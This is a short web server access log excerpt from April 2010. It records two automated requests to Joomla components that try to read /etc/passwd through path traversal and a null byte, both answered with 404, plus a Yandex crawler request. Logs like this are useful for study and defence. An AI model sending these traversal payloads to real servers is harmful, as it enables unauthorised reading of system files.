69.57.164.32 - - [21/Apr/2010:02:14:48 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
85.19.150.100 - - [21/Apr/2010:02:14:48 -0500] "GET /logs////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
87.250.255.243 - - [21/Apr/2010:02:15:18 -0500] "GET /logs/access_log.1168473600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
